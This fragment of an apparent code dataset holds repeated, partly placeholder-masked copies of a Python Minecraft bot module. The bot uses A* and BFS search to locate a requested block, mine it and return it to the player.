_GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del 